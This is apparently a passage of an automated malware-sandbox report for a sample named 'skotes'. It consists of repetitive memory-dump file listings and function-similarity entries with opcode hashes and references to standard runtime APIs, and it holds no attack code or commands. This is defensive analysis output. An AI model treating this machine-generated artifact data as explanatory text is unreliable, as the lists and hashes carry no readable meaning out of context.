                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3844194624-0
                                                                                                                                                                                            • Opcode ID: fa447d5bde883f7f3f2f61e1c2bc36dc72fd480db716f9eef6bb3b8bfd100063
                                                                                                                                                                                            • Instruction ID: 0c0e417a38c4ddd97cd5c386b991532b07829cd7c72eadbb7bbed3823261f727
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa447d5bde883f7f3f2f61e1c2bc36dc72fd480db716f9eef6bb3b8bfd100063
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2801F971300D31BFCA65BB60D9CADADB76BBF44760704042DF80097612DF20EC619AD4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006333DB
                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006333EF
                                                                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00633407
                                                                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0063341F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 78362717-0
                                                                                                                                                                                            • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                            • Instruction ID: 7792a54a8815fe82b0ee362559943316a4dc0340b36881711c323282c9a8b182
                                                                                                                                                                                            • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                            • Instruction Fuzzy Hash: A601D632A00534A7CF16EF649841AEFB7EB9F54350F100019FC12AB382DA71EE1197E0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00629519
                                                                                                                                                                                              • Part of subcall function 0061F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00625486
                                                                                                                                                                                            • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0062953D
                                                                                                                                                                                            • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00629550
                                                                                                                                                                                            • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00629559
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 218105897-0
                                                                                                                                                                                            • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                            • Instruction ID: 9604d3797518e79d7f6831eaa7f09204de6116e2b8c74e22d451afe33e4e0957
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2F0A030700E305FE6A2AB68A811FAA23D79F80711F00841DE41BA7682CE24E846CFA5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0063F232
                                                                                                                                                                                            • __freea.LIBCMT ref: 0063F298
                                                                                                                                                                                              • Part of subcall function 0063B04B: RtlAllocateHeap.NTDLL(00000000,8FC8FEA1,?,?,0061D3FC,8FC8FEA1,?,00617A8B,?,?,?,?,?,?,00607465,?), ref: 0063B07E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
